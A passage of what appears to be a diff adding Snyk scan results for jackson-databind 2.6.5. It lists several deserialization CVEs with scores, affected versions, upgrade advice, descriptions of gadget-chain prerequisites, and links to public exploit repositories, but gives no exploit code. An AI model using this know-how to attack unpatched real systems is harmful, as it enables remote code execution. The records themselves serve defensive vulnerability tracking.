"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an 